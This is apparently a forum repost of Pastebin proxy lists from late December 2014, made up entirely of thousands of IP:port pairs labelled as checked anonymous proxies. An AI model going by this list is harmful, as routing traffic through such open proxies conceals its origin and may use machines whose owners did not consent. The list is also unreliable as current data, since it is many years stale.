59.92.112.59:9064 59.93.40.163:9064 59.95.231.167:9064 59.95.3.204:9064 60.250.81.118:80 60.250.81.118:8080 60.250.81.97:80 60.55.42.177:3128 60.55.43.3:3128 61.133.51.6:9999 61.135.137.49:9000 61.156.35.2:3128 61.158.173.188:9999 61.163.165.250:9999 61.227.126.218:9064 61.227.212.176:9064 61.228.21.248:9064 61.230.44.216:9064 61.232.6.164:8081 61.234.123.64:8080 61.62.36.151:9064 61.70.163.141:9064 61.91.251.4:8080 62.103.107.9:80 64.31.22.131:7808 64.31.22.131:8089 66.192.33.78:3128 66.192.33.78:8080 67.86.6.210:8800 68.91.163.19:8180 69.197.148.18:7808 69.197.148.18:8089 69.251.23.155:8800 69.84.207.209:8080 71.95.127.103:8800 77.81.105.147:7808 77.81.105.147:8089 77.92.104.115:8888 79.127.123.18:8080 8.225.186.27:3128 80.64.81.34:3128 81.163.88.65:8080 81.196.48.188:8888 82.118.249.190:4444 82.148.195.194:8080 82.208.99.71:3128 82.209.199.214:8080 83.142.1.45:9064 83.180.243.48:9064 83.49.78.77:8080 84.22.32.222:3128 85.249.40.14:9090 85.9.209.244:8080 86.101.235.77:8080 86.132.47.112:3128 88.117.175.30:8080 89.235.9.86:3128 89.34.12.13:8888 90.159.237.155:8080 91.108.139.115:8080 91.121.243.55:80 91.147.196.175:3128 91.204.112.42:8080 91.214.86.154:3128 91.226.108.69:80 91.235.125.3:4444 92.46.125.19:3128 92.62.230.13:8888 94.42.81.51:8080 95.0.35.141:8080 95.140.28.208:3128 95.78.171.155:8088 97.91.171.31:8800 98.178.140.49:8800 98.239.6.79:8800 98.253.230.221:8800 Sursa: 31-12-14 | Free SSL Proxies (3103) - Pastebin.com

[h=1]31-12-14 | Fast Proxy Server List (3479)[/h]By: gelbeseiten on Dec 30th, 2014 31-12-14 | Fast Proxy Server List (3479) Checked & filtered verified L1/L2/L3 (Timeout 3) 1.160.13.205:8080 1.161.220.170:9064 1.164.181.116:9064 1.164.182.191:9064 1.164.33.82:9064 1.164.44.92:9064 1.165.109.87:9064 1.168.14.126:9064 1.168.173.214:9064 1.170.117.74:9064 1.170.118.15:9064 1.170.118.233:9064 1.170.153.124:9064 1.170.175.215:9064 1.170.23.107:9064 1.170.25.41:9064 1.171.205.102:9064 1.172.21.124:9064 1.172.57.235:9064 1.173.185.174:9064 1.173.208.235:9064 1.174.185.82:9064 1.175.121.231:9064 1.175.79.90:9064 1.186.120.185:9064 1.186.120.198:9064 1.186.14.175:9064 1.186.145.157:9064 1.186.157.64:9064 1.186.217.126:9064 1.186.235.102:9064 1.186.251.90:9064 1.191.250.68:8585 1.192.230.199:8585 1.193.86.162:8118 1.22.100.119:9064 1.22.106.14:9064 1.22.122.233:9064 1.22.84.192:9064 1.23.148.232:9064 1.23.176.32:9064 1.23.66.143:9064 1.34.66.148:80 1.84.237.203:8585 101.0.35.117:9064 101.1.16.123:3128 101.218.15.54:9064 101.226.12.223:80 101.251.238.123:8080 101.4.136.34:9999 101.4.136.5:9999 101.57.47.82:9064 101.63.120.25:9064 101.63.137.156:9064 101.63.139.122:9064 101.63.146.2:9064 101.63.200.241:9064 101.63.206.23:9064 101.63.225.191:9064 103.16.30.61:9064 103.17.164.185:80 103.23.33.88:9064 103.244.240.104:9064 103.248.248.121:8080 103.249.122.113:9064 103.249.27.25:9064 103.249.37.83:9064 103.251.82.153:9064 103.29.116.82:9064 103.3.188.221:8080 103.3.207.182:9064 103.41.176.1:7808 104.131.119.230:3128 104.131.122.190:3128 104.194.206.10:7808 104.194.206.10:8089 104.236.75.74:8080 106.0.168.46:8080 106.1.29.32:9064 106.185.32.238:8080 106.2.184.227:3128 106.2.184.227:8080 106.2.184.228:80 106.2.184.228:8080 106.2.192.23:80 106.2.192.24:80 106.216.215.185:9064 106.37.177.251:3128 106.83.241.34:8118 106.91.26.185:8118 106.91.29.155:8118 107.170.216.78:3128 107.182.17.243:7808 107.182.17.243:8089 108.61.204.79:3128 110.138.248.132:80 110.138.49.197:8080 110.153.9.250:80 110.227.61.112:9064 110.232.93.218:8087 110.255.13.216:8585 110.31.114.204:9064 110.4.12.173:80 110.4.12.178:80 110.54.224.251:8080 110.77.0.3:80 110.77.233.164:3128 110.78.155.92:3128 110.78.162.6:8080 111.1.3.38:8000 111.1.36.166:80 111.1.36.166:85 111.1.60.163:80 111.10.100.227:8123 111.10.100.236:8123 111.10.100.65:8123 111.10.102.43:8123 111.10.102.75:8123 111.10.103.14:8123 111.10.109.166:8123 111.10.112.199:8123 111.10.113.157:8123 111.10.116.42:8123 111.10.117.123:8123 111.10.118.112:8123 111.10.118.159:8123 111.10.132.219:8123 111.10.136.18:8123 111.10.137.183:8123 111.10.137.213:8123 111.10.137.94:8123 111.10.139.191:8123 111.10.139.72:8123 111.10.14.106:8123 111.10.144.150:8123 111.10.144.94:8123 111.10.145.139:8123 111.10.145.188:8123 111.10.145.65:8123 111.10.146.235:8123 111.10.147.135:8123 111.10.147.165:8123 111.10.147.19:8123 111.10.147.216:8123 111.10.147.27:8123 111.10.15.162:8123 111.10.152.119:8123 111.10.152.16:8123 111.10.152.163:8123 111.10.152.177:8123 111.10.152.219:8123 111.10.152.71:8123 111.10.153.168:8123 111.10.153.80:8123 111.10.154.11:8123 111.10.155.239:8123 111.10.155.71:8123 111.10.158.149:8123 111.10.158.91:8123 111.10.162.152:8123 111.10.164.120:8123 111.10.166.122:8123 111.10.167.176:8123 111.10.167.31:8123 111.10.172.67:8123 111.10.175.240:8123 111.10.178.217:8123 111.10.180.230:8123 111.10.185.126:8123 111.10.186.0:8123 111.10.186.139:8123 111.10.187.185:8123 111.10.187.55:8123 111.10.188.67:8123 111.10.192.124:8123 111.10.192.17:8123 111.10.194.124:8123 111.10.195.153:8123 111.10.195.69:8123 111.10.196.177:8123 111.10.196.251:8123 111.10.197.50:8123 111.10.198.100:8123 111.10.198.115:8123 111.10.198.151:8123 111.10.198.251:8123 111.10.199.47:8123 111.10.219.154:8123 111.10.29.114:8123 111.10.29.143:8123 111.10.39.115:8123 111.10.45.179:8123 111.10.48.123:8123 111.10.49.104:8123 111.10.50.119:8123 111.10.50.225:8123 111.10.72.212:8123 111.10.74.150:8123 111.10.88.162:8123 111.10.88.82:8123 111.10.90.214:8123 111.10.94.216:8123 111.10.96.11:8123 111.10.96.126:8123 111.10.96.174:8123 111.10.96.54:8123 111.10.97.154:8123 111.10.97.202:8123 111.10.97.218:8123 111.10.97.239:8123 111.10.98.63:8123 111.11.250.127:8123 111.11.95.245:80 111.13.55.3:22 111.161.126.100:80 111.161.126.101:80 111.161.126.98:80 111.161.126.99:80 111.164.222.10:8118 111.164.53.67:8118 111.166.203.67:8118 111.175.134.10:8585 111.181.149.184:8585 111.185.55.13:9064 111.192.163.150:8118 111.197.164.140:8118 111.2.240.156:8123 111.2.242.244:8123 111.2.244.128:8123 111.206.81.248:80 111.240.5.25:9064 111.241.19.252:9064 111.242.158.16:9064 111.242.47.105:9064 111.243.146.40:9064 111.243.96.138:9064 111.246.14.208:9064 111.248.174.148:9064 111.248.88.130:9064 111.249.44.56:9064 111.250.12.64:9064 111.250.74.84:9064 111.251.126.234:9064 111.251.150.143:9064 111.251.94.40:9064 111.252.190.232:8088 111.252.212.83:8088 111.252.218.173:8088 111.253.211.77:9064 111.253.57.86:9064 111.254.107.3:9064 111.254.191.27:9064 111.254.220.140:8088 111.254.222.213:8088 111.254.57.237:8088 111.255.116.16:8088 111.255.15.109:8088 111.255.164.99:8088 111.255.193.176:9064 111.255.224.18:8088 111.255.48.251:8088 111.3.68.107:8123 111.3.88.230:8123 111.3.93.255:8123 111.9.234.71:8123 111.9.243.49:8123 111.92.123.183:9064 111.95.131.85:9064 112.0.104.52:8123 112.0.119.47:8123 112.0.206.168:8123 112.0.209.223:8123 112.0.21.153:8123 112.0.212.120:8123 112.0.221.127:8123 112.0.29.43:8123 112.1.160.206:8123 112.1.167.2:8123 112.1.172.248:8123 112.1.184.59:8123 112.1.222.101:8123 112.102.14.108:8585 112.104.135.179:8088 112.104.150.123:9064 112.104.16.65:9064 112.104.196.77:8088 112.105.124.68:9064 112.105.38.10:9064 112.114.58.196:8585 112.114.76.21:18186 112.15.125.156:8123 112.15.24.11:8123 112.15.25.155:8123 112.15.29.109:8123 112.15.62.149:8123 112.15.69.118:8123 112.15.87.38:8123 112.18.11.245:8123 112.18.152.14:8123 112.18.154.101:8123 112.18.159.117:8123 112.18.159.13:8123 112.18.159.245:8123 112.18.159.36:8123 112.18.160.34:8123 112.18.160.48:8123 112.18.163.120:8123 112.18.163.174:8123 112.18.164.184:8123 112.18.166.185:8123 112.18.166.222:8123 112.18.166.249:8123 112.18.167.128:8123 112.18.167.131:8123 112.18.168.142:8123 112.18.170.139:8123 112.18.170.15:8123 112.18.170.212:8123 112.18.170.67:8123 112.18.171.32:8123 112.18.171.4:8123 112.18.172.87:8123 112.18.175.142:8123 112.18.176.142:8123 112.18.176.99:8123 112.18.177.199:8123 112.18.178.133:8123 112.18.178.15:8123 112.18.178.90:8123 112.18.179.240:8123 112.18.196.149:8123 112.18.197.85:8123 112.18.199.109:8123 112.18.199.152:8123 112.18.20.130:8123 112.18.20.205:8123 112.18.23.248:8123 112.18.24.43:8123 112.18.48.95:8123 112.18.49.53:8123 112.18.52.202:8123 112.18.56.186:8123 112.18.62.231:8123 112.18.65.203:8123 112.18.75.18:8123 112.18.79.154:8123 112.19.143.230:8123 112.197.202.100:9064 112.2.184.203:8123 112.20.156.155:8123 112.20.204.66:8123 112.20.229.8:8123 112.20.236.110:8123 112.20.246.58:8123 112.21.155.186:8123 112.21.155.98:8123 112.21.16.52:8123 112.21.211.26:8123 112.21.242.52:8123 112.21.250.161:8123 112.21.5.116:8123 112.22.227.89:8123 112.22.230.167:8123 112.22.234.50:8123 112.22.236.156:8123 112.22.245.250:8123 112.23.121.3:8123 112.23.248.74:8123 112.238.200.124:8585 112.24.126.78:8123 112.24.228.78:8123 112.24.252.80:8123 112.24.61.131:8123 112.24.78.53:8123 112.24.92.154:8123 112.24.94.24:8123 112.24.94.55:8123 112.3.104.8:8123 112.3.105.162:8123 112.3.135.88:8123 112.3.199.43:8123 112.3.202.94:8123 112.3.211.218:8123 112.44.226.140:8123 112.44.226.43:8123 112.44.227.202:8123 112.44.230.150:8123 112.44.230.190:8123 112.44.234.57:8123 112.44.236.5:8123 112.44.238.11:8123 112.44.242.197:8123 112.44.243.74:8123 112.44.247.105:8123 112.44.251.41:8123 112.45.176.162:8123 112.45.179.183:8123 112.45.179.189:8123 112.45.182.32:8123 112.45.183.43:8123 112.45.185.128:8123 112.45.185.207:8123 112.45.185.235:8123 112.45.188.73:8123 112.45.189.95:8123 112.5.253.83:80 112.65.44.71:3128 112.78.37.195:8080 112.82.169.95:18186 113.105.142.228:80 113.105.224.86:80 113.105.224.87:80 113.107.57.76:3128 113.119.205.252:9999 113.16.22.125:8118 113.16.86.127:8118 113.193.104.237:9064 113.193.193.215:9064 113.21.71.177:9064 113.214.13.1:8000 113.215.9.200:9999 113.229.74.55:8585 113.254.21.88:9064 113.57.230.54:80 113.63.211.194:8118 113.76.164.120:9999 113.87.18.234:9999 114.112.91.97:90 114.215.151.133:3128 114.215.237.93:3128 114.235.250.23:8585 114.24.12.126:9064 114.243.145.52:8118 114.25.30.237:9064 114.25.33.220:9064 114.252.255.114:8118 114.253.244.153:8118 114.255.183.163:8080 114.255.183.164:8080 114.27.12.37:9064 114.27.19.81:8088 114.27.200.161:8088 114.27.234.114:8088 114.27.250.130:8088 114.27.27.238:9064 114.27.35.239:8088 114.27.55.83:8088 114.36.20.53:9064 114.37.128.85:9064 114.37.156.31:8088 114.37.237.138:9064 114.37.40.3:8088 114.37.91.17:9064 114.38.153.199:8088 114.38.232.3:8088 114.38.67.85:8088 114.38.70.134:9064 114.39.143.6:9064 114.39.208.141:9064 114.39.243.183:8088 114.39.61.174:8088 114.40.157.120:9064 114.40.186.67:9064 114.40.227.246:9064 114.40.251.63:9064 114.40.69.242:8080 114.42.121.104:9064 114.42.146.22:9064 114.43.112.250:9064 114.43.60.98:9064 114.44.70.46:9064 114.45.32.95:9064 114.47.59.33:9064 114.69.229.69:8080 114.79.171.204:9064 115.112.130.227:9064 115.118.235.218:9064 115.119.0.138:9064 115.124.75.148:80 115.124.75.151:80 115.127.64.62:8080 115.154.191.110:3128 115.154.225.119:8585 115.184.134.62:9064 115.185.151.147:9064 115.187.47.85:9064 115.187.55.170:9064 115.187.58.10:9064 115.196.51.169:8118 115.200.38.19:18186 115.202.167.180:8585 115.225.7.91:8118 115.236.59.194:3128 115.238.225.26:80 115.240.136.160:9064 115.241.1.187:9064 115.241.86.80:9064 115.242.120.200:9064 115.242.159.138:9064 115.242.165.90:9064 115.242.250.104:9064 115.244.237.54:9064 115.245.115.177:9064 115.252.220.71:9064 115.28.137.189:3128 115.28.236.172:3128 115.28.90.72:8080 115.29.164.173:80 115.29.209.210:3128 115.29.247.115:8888 115.29.250.118:3128 115.31.160.3:8080 116.193.132.203:9064 116.20.199.92:8585 116.202.201.97:9064 116.202.241.213:9064 116.202.47.50:9064 116.202.89.220:9064 116.203.111.206:9064 116.203.215.246:9064 116.203.27.92:9064 116.207.44.70:8585 116.228.80.186:8080 116.75.196.84:9064 116.75.99.71:9064 117.135.252.14:80 117.135.252.15:80 117.135.252.17:80 117.136.148.214:8123 117.139.149.216:8123 117.139.2.50:8123 117.139.28.236:8123 117.139.28.252:8123 117.139.28.50:8123 117.139.29.33:8123 117.139.29.91:8123 117.139.36.69:8123 117.139.38.176:8123 117.139.38.18:8123 117.139.38.80:8123 117.139.39.250:8123 117.139.41.18:8123 117.139.44.171:8123 117.139.44.94:8123 117.139.45.175:8123 117.139.45.66:8123 117.139.70.128:8123 117.139.71.46:8123 117.147.206.137:8123 117.148.41.116:8123 117.148.43.158:8123 117.148.55.222:8123 117.149.196.236:8123 117.149.221.106:8123 117.149.224.141:8123 117.149.240.156:8123 117.149.243.146:8123 117.15.179.194:8585 117.162.100.136:8123 117.162.101.16:8123 117.162.105.32:8123 117.162.112.90:8123 117.162.130.107:8123 117.162.132.149:8123 117.162.135.96:8123 117.162.136.13:8123 117.162.136.20:8123 117.162.138.20:8123 117.162.139.103:8123 117.162.164.144:8123 117.162.168.37:8123 117.162.175.158:8123 117.162.206.192:8123 117.162.208.208:8123 117.162.210.16:8123 117.162.216.45:8123 117.162.225.83:8123 117.162.227.103:8123 117.162.227.252:8123 117.162.233.87:8123 117.162.239.217:8123 117.162.239.219:8123 117.162.241.81:8123 117.162.242.178:8123 117.162.248.233:8123 117.162.41.192:8123 117.162.82.174:8123 117.162.82.49:8123 117.162.97.155:8123 117.163.100.252:8123 117.163.105.194:8123 117.163.108.76:8123 117.163.112.46:8123 117.163.113.38:8123 117.163.116.134:8123 117.163.118.143:8123 117.163.123.28:8123 117.163.127.224:8123 117.163.128.121:8123 117.163.128.181:8123 117.163.129.204:8123 117.163.130.243:8123 117.163.132.85:8123 117.163.137.40:8123 117.163.138.122:8123 117.163.145.27:8123 117.163.149.82:8123 117.163.150.173:8123 117.163.151.188:8123 117.163.155.232:8123 117.163.156.218:8123 117.163.156.77:8123 117.163.157.82:8123 117.163.167.22:8123 117.163.167.37:8123 117.163.168.132:8123 117.163.17.216:8123 117.163.170.124:8123 117.163.171.42:8123 117.163.171.75:8123 117.163.179.45:8123 117.163.194.116:8123 117.163.203.129:8123 117.163.204.8:8123 117.163.21.106:8123 117.163.214.17:8123 117.163.215.96:8123 117.163.217.158:8123 117.163.220.68:8123 117.163.221.190:8123 117.163.221.202:8123 117.163.222.216:8123 117.163.225.106:8123 117.163.227.165:8123 117.163.227.188:8123 117.163.227.63:8123 117.163.228.24:8123 117.163.237.132:8123 117.163.239.150:8123 117.163.240.181:8123 117.163.245.80:8123 117.163.246.63:8123 117.163.246.89:8123 117.163.250.215:8123 117.163.252.171:8123 117.163.30.31:8123 117.163.30.70:8123 117.163.31.117:8123 117.163.31.206:8123 117.163.34.101:8123 117.163.4.206:8123 117.163.46.153:8123 117.163.64.209:8123 117.163.65.57:8123 117.163.67.71:8123 117.163.68.156:8123 117.163.68.19:8123 117.163.7.0:8123 117.163.98.255:8123 117.164.10.73:8123 117.164.107.85:8123 117.164.128.243:8123 117.164.130.179:8123 117.164.131.17:8123 117.164.133.197:8123 117.164.133.254:8123 117.164.134.168:8123 117.164.134.71:8123 117.164.135.206:8123 117.164.135.53:8123 117.164.136.150:8123 117.164.136.168:8123 117.164.136.175:8123 117.164.137.91:8123 117.164.139.166:8123 117.164.14.185:8123 117.164.140.21:8123 117.164.141.209:8123 117.164.142.81:8123 117.164.143.118:8123 117.164.143.234:8123 117.164.144.32:8123 117.164.146.12:8123 117.164.146.27:8123 117.164.150.154:8123 117.164.152.234:8123 117.164.153.82:8123 117.164.156.87:8123 117.164.157.165:8123 117.164.158.196:8123 117.164.158.59:8123 117.164.161.104:8123 117.164.161.235:8123 117.164.167.152:8123 117.164.167.203:8123 117.164.167.69:8123 117.164.171.229:8123 117.164.172.178:8123 117.164.173.215:8123 117.164.174.158:8123 117.164.174.193:8123 117.164.175.184:8123 117.164.175.233:8123 117.164.178.218:8123 117.164.184.228:8123 117.164.184.230:8123 117.164.187.224:8123 117.164.192.2:8123 117.164.193.121:8123 117.164.196.12:8123 117.164.197.211:8123 117.164.199.62:8123 117.164.201.243:8123 117.164.203.107:8123 117.164.203.191:8123 117.164.204.222:8123 117.164.204.45:8123 117.164.206.36:8123 117.164.207.234:8123 117.164.214.82:8123 117.164.215.139:8123 117.164.215.152:8123 117.164.215.224:8123 117.164.217.164:8123 117.164.221.213:8123 117.164.227.62:8123 117.164.228.230:8123 117.164.229.62:8123 117.164.229.89:8123 117.164.231.218:8123 117.164.236.216:8123 117.164.245.66:8123 117.164.253.191:8123 117.164.28.86:8123 117.164.28.98:8123 117.164.29.62:8123 117.164.3.137:8123 117.164.30.6:8123 117.164.32.38:8123 117.164.38.132:8123 117.164.38.255:8123 117.164.39.160:8123 117.164.40.134:8123 117.164.43.162:8123 117.164.45.62:8123 117.164.48.196:8123 117.164.48.230:8123 117.164.49.0:8123 117.164.49.141:8123 117.164.5.199:8123 117.164.5.234:8123 117.164.51.249:8123 117.164.52.205:8123 117.164.54.0:8123 117.164.54.165:8123 117.164.55.199:8123 117.164.56.193:8123 117.164.58.197:8123 117.164.59.238:8123 117.164.60.182:8123 117.164.62.249:8123 117.164.7.94:8123 117.164.8.142:8123 117.164.8.2:8123 117.164.95.36:8123 117.164.97.9:8123 117.165.10.120:8123 117.165.101.55:8123 117.165.103.103:8123 117.165.103.90:8123 117.165.12.145:8123 117.165.121.69:8123 117.165.128.131:8123 117.165.13.231:8123 117.165.130.30:8123 117.165.131.21:8123 117.165.131.53:8123 117.165.131.97:8123 117.165.135.141:8123 117.165.138.180:8123 117.165.139.235:8123 117.165.14.230:8123 117.165.140.147:8123 117.165.143.67:8123 117.165.145.157:8123 117.165.146.116:8123 117.165.148.198:8123 117.165.15.149:8123 117.165.153.56:8123 117.165.176.106:8123 117.165.18.130:8123 117.165.187.153:8123 117.165.194.34:8123 117.165.198.154:8123 117.165.211.134:8123 117.165.220.47:8123 117.165.224.122:8123 117.165.226.102:8123 117.165.226.64:8123 117.165.230.224:8123 117.165.29.13:8123 117.165.31.6:8123 117.165.32.220:8123 117.165.33.115:8123 117.165.34.152:8123 117.165.35.126:8123 117.165.43.16:8123 117.165.45.191:8123 117.165.47.144:8123 117.165.48.211:8123 117.165.51.214:8123 117.165.53.44:8123 117.165.62.233:8123 117.165.66.173:8123 117.165.66.5:8123 117.165.77.229:8123 117.165.79.234:8123 117.165.79.47:8123 117.165.8.237:8123 117.165.80.164:8123 117.165.86.192:8123 117.165.87.190:8123 117.165.89.143:8123 117.165.89.162:8123 117.165.89.236:8123 117.166.102.64:8123 117.166.104.99:8123 117.166.105.193:8123 117.166.105.239:8123 117.166.106.220:8123 117.166.106.61:8123 117.166.106.95:8123 117.166.107.13:8123 117.166.109.13:8123 117.166.109.3:8123 117.166.11.53:8123 117.166.113.194:8123 117.166.120.122:8123 117.166.122.57:8123 117.166.124.185:8123 117.166.126.32:8123 117.166.13.198:8123 117.166.132.126:8123 117.166.134.169:8123 117.166.166.3:8123 117.166.167.75:8123 117.166.169.112:8123 117.166.170.61:8123 117.166.171.230:8123 117.166.173.124:8123 117.166.173.227:8123 117.166.174.211:8123 117.166.18.104:8123 117.166.18.105:8123 117.166.18.150:8123 117.166.18.184:8123 117.166.18.89:8123 117.166.185.74:8123 117.166.186.157:8123 117.166.196.60:8123 117.166.197.189:8123 117.166.200.171:8123 117.166.203.204:8123 117.166.205.70:8123 117.166.206.18:8123 117.166.206.68:8123 117.166.207.163:8123 117.166.207.75:8123 117.166.212.52:8123 117.166.213.236:8123 117.166.215.221:8123 117.166.219.20:8123 117.166.22.173:8123 117.166.22.214:8123 117.166.220.177:8123 117.166.221.91:8123 117.166.222.42:8123 117.166.224.157:8123 117.166.225.65:8123 117.166.226.213:8123 117.166.226.47:8123 117.166.231.241:8123 117.166.234.99:8123 117.166.243.140:8123 117.166.244.113:8123 117.166.247.178:8123 117.166.250.124:8123 117.166.31.78:8123 117.166.34.176:8123 117.166.35.188:8123 117.166.40.18:8123 117.166.40.72:8123 117.166.41.222:8123 117.166.42.62:8123 117.166.44.207:8123 117.166.45.135:8123 117.166.45.90:8123 117.166.46.215:8123 117.166.47.250:8123 117.166.48.5:8123 117.166.50.238:8123 117.166.52.203:8123 117.166.54.16:8123 117.166.56.147:8123 117.166.57.18:8123 117.166.59.178:8123 117.166.64.16:8123 117.166.68.108:8123 117.166.70.197:8123 117.166.73.223:8123 117.166.76.137:8123 117.166.76.83:8123 117.166.77.192:8123 117.166.78.65:8123 117.166.79.45:8123 117.166.8.116:8123 117.166.86.183:8123 117.166.88.28:8123 117.166.89.2:8123 117.166.89.210:8123 117.166.9.208:8123 117.166.91.10:8123 117.166.92.205:8123 117.166.94.16:8123 117.166.98.185:8123 117.166.99.205:8123 117.167.10.217:8123 117.167.107.68:8123 117.167.131.63:8123 117.167.133.46:8123 117.167.134.157:8123 117.167.136.224:8123 117.167.140.2:8123 117.167.15.20:8123 117.167.153.70:8123 117.167.159.97:8123 117.167.164.9:8123 117.167.165.140:8123 117.167.167.222:8123 117.167.168.197:8123 117.167.169.30:8123 117.167.174.183:8123 117.167.176.159:8123 117.167.177.165:8123 117.167.177.65:8123 117.167.178.190:8123 117.167.181.154:8123 117.167.183.69:8123 117.167.184.27:8123 117.167.208.248:8123 117.167.208.46:8123 117.167.212.160:8123 117.167.217.207:8123 117.167.222.124:8123 117.167.224.196:8123 117.167.229.18:8123 117.167.229.50:8123 117.167.230.61:8123 117.167.231.72:8123 117.167.232.171:8123 117.167.233.112:8123 117.167.234.146:8123 117.167.235.211:8123 117.167.237.17:8123 117.167.239.113:8123 117.167.239.29:8123 117.167.244.29:8123 117.167.32.184:8123 117.167.40.105:8123 117.167.42.91:8123 117.167.55.144:8123 117.167.59.103:8123 117.167.61.90:8123 117.167.64.2:8123 117.167.65.228:8123 117.167.66.184:8123 117.167.66.223:8123 117.167.67.153:8123 117.167.70.225:8123 117.167.71.110:8123 117.167.8.178:8123 117.167.8.185:8123 117.167.8.213:8123 117.167.81.254:8123 117.169.161.185:8123 117.169.162.74:8123 117.169.163.71:8123 117.169.165.42:8123 117.169.166.76:8123 117.169.166.87:8123 117.169.166.90:8123 117.169.167.173:8123 117.169.167.3:8123 117.169.186.105:8123 117.169.189.141:8123 117.169.191.155:8123 117.169.195.52:8123 117.169.200.163:8123 117.169.201.98:8123 117.169.205.29:8123 117.169.206.244:8123 117.169.206.93:8123 117.169.206.94:8123 117.169.224.146:8123 117.169.224.196:8123 117.169.225.28:8123 117.169.226.42:8123 117.169.227.22:8123 117.169.228.116:8123 117.169.228.132:8123 117.169.228.209:8123 117.169.229.142:8123 117.169.230.10:8123 117.169.230.155:8123 117.169.230.230:8123 117.169.230.238:8123 117.169.231.18:8123 117.169.232.90:8123 117.169.234.138:8123 117.169.236.136:8123 117.169.236.176:8123 117.169.237.12:8123 117.169.237.154:8123 117.169.237.245:8123 117.169.237.28:8123 117.169.237.99:8123 117.169.241.112:8123 117.169.241.209:8123 117.169.245.7:8123 117.169.253.190:8123 117.169.253.191:8123 117.170.104.120:8123 117.170.104.213:8123 117.170.11.69:8123 117.170.112.126:8123 117.170.112.77:8123 117.170.115.236:8123 117.170.119.142:8123 117.170.12.149:8123 117.170.12.231:8123 117.170.121.153:8123 117.170.121.5:8123 117.170.122.44:8123 117.170.124.110:8123 117.170.125.52:8123 117.170.134.109:8123 117.170.14.136:8123 117.170.142.195:8123 117.170.147.57:8123 117.170.158.193:8123 117.170.161.15:8123 117.170.166.4:8123 117.170.172.221:8123 117.170.173.151:8123 117.170.173.250:8123 117.170.173.59:8123 117.170.175.103:8123 117.170.176.131:8123 117.170.176.247:8123 117.170.176.40:8123 117.170.177.119:8123 117.170.178.165:8123 117.170.179.149:8123 117.170.18.129:8123 117.170.18.72:8123 117.170.19.132:8123 117.170.20.129:8123 117.170.200.5:8123 117.170.206.27:8123 117.170.207.83:8123 117.170.21.105:8123 117.170.21.133:8123 117.170.21.237:8123 117.170.211.10:8123 117.170.212.222:8123 117.170.214.255:8123 117.170.216.135:8123 117.170.216.188:8123 117.170.217.203:8123 117.170.217.73:8123 117.170.217.99:8123 117.170.220.246:8123 117.170.222.206:8123 117.170.223.38:8123 117.170.223.95:8123 117.170.225.215:8123 117.170.225.246:8123 117.170.227.111:8123 117.170.227.138:8123 117.170.227.200:8123 117.170.23.97:8123 117.170.230.110:8123 117.170.230.52:8123 117.170.231.208:8123 117.170.238.255:8123 117.170.241.30:8123 117.170.242.69:8123 117.170.247.61:8123 117.170.249.25:8123 117.170.26.134:8123 117.170.33.240:8123 117.170.34.50:8123 117.170.35.179:8123 117.170.36.240:8123 117.170.44.232:8123 117.170.5.116:8123 117.170.59.163:8123 117.170.59.92:8123 117.170.7.181:8123 117.170.8.181:8123 117.171.102.30:8123 117.171.105.110:8123 117.171.105.56:8123 117.171.124.119:8123 117.171.124.134:8123 117.171.127.144:8123 117.171.131.224:8123 117.171.136.22:8123 117.171.137.199:8123 117.171.139.150:8123 117.171.14.4:8123 117.171.142.63:8123 117.171.143.203:8123 117.171.143.29:8123 117.171.148.164:8123 117.171.153.112:8123 117.171.153.173:8123 117.171.153.236:8123 117.171.159.244:8123 117.171.160.185:8123 117.171.161.90:8123 117.171.162.66:8123 117.171.163.47:8123 117.171.168.83:8123 117.171.172.230:8123 117.171.172.239:8123 117.171.174.252:8123 117.171.175.180:8123 117.171.189.229:8123 117.171.19.103:8123 117.171.19.82:8123 117.171.190.34:8123 117.171.21.221:8123 117.171.22.109:8123 117.171.221.110:8123 117.171.224.62:8123 117.171.224.78:8123 117.171.225.237:8123 117.171.226.9:8123 117.171.229.253:8123 117.171.230.203:8123 117.171.230.237:8123 117.171.232.71:8123 117.171.233.11:8123 117.171.233.14:8123 117.171.234.15:8123 117.171.234.84:8123 117.171.237.186:8123 117.171.238.86:8123 117.171.240.156:8123 117.171.241.160:8123 117.171.241.164:8123 117.171.242.184:8123 117.171.245.127:8123 117.171.247.147:8123 117.171.247.91:8123 117.171.248.78:8123 117.171.250.38:8123 117.171.250.59:8123 117.171.251.76:8123 117.171.251.90:8123 117.171.30.96:8123 117.171.31.161:8123 117.171.45.26:8123 117.171.49.168:8123 117.171.49.48:8123 117.171.53.182:8123 117.171.53.249:8123 117.171.53.98:8123 117.171.54.5:8123 117.171.61.155:8123 117.171.66.157:8123 117.171.73.117:8123 117.171.74.132:8123 117.171.77.121:8123 117.171.77.95:8123 117.171.78.132:8123 117.171.86.185:8123 117.172.153.173:8123 117.172.155.187:8123 117.172.155.222:8123 117.172.157.201:8123 117.172.220.6:8123 117.172.222.192:8123 117.172.76.78:8123 117.172.76.87:8123 117.172.77.187:8123 117.172.77.240:8123 117.172.78.3:8123 117.173.108.188:8123 117.173.110.112:8123 117.173.120.142:8123 117.173.120.162:8123 117.173.121.159:8123 117.173.16.92:8123 117.173.18.106:8123 117.173.20.115:8123 117.173.20.207:8123 117.173.20.230:8123 117.173.20.233:8123 117.173.20.43:8123 117.173.20.55:8123 117.173.20.75:8123 117.173.20.85:8123 117.173.20.91:8123 117.173.205.155:8123 117.173.205.199:8123 117.173.21.146:8123 117.173.21.156:8123 117.173.21.163:8123 117.173.21.242:8123 117.173.21.74:8123 117.173.21.88:8123 117.173.22.179:8123 117.173.22.198:8123 117.173.22.202:8123 117.173.22.223:8123 117.173.23.127:8123 117.173.23.132:8123 117.173.23.133:8123 117.173.23.14:8123 117.173.23.225:8123 117.173.23.44:8123 117.173.23.92:8123 117.173.235.138:8123 117.173.240.37:8123 117.173.241.136:8123 117.173.242.66:8123 117.173.245.55:8123 117.173.246.108:8123 117.173.246.86:8123 117.173.253.133:8123 117.173.253.141:8123 117.173.253.55:8123 117.173.254.142:8123 117.173.254.234:8123 117.173.254.63:8123 117.173.58.107:8123 117.173.58.136:8123 117.173.59.239:8123 117.173.59.246:8123 117.173.62.153:8123 117.173.63.170:8123 117.173.80.10:8123 117.173.80.8:8123 117.173.81.209:8123 117.173.81.236:8123 117.173.81.67:8123 117.173.82.252:8123 117.174.1.100:8123 117.174.193.181:8123 117.174.193.26:8123 117.174.194.135:8123 117.174.194.89:8123 117.174.195.125:8123 117.174.195.141:8123 117.174.195.158:8123 117.174.196.90:8123 117.174.197.94:8123 117.174.199.87:8123 117.174.2.185:8123 117.174.2.88:8123 117.174.200.170:8123 117.174.201.110:8123 117.174.201.239:8123 117.174.201.91:8123 117.174.203.137:8123 117.174.203.66:8123 117.174.203.88:8123 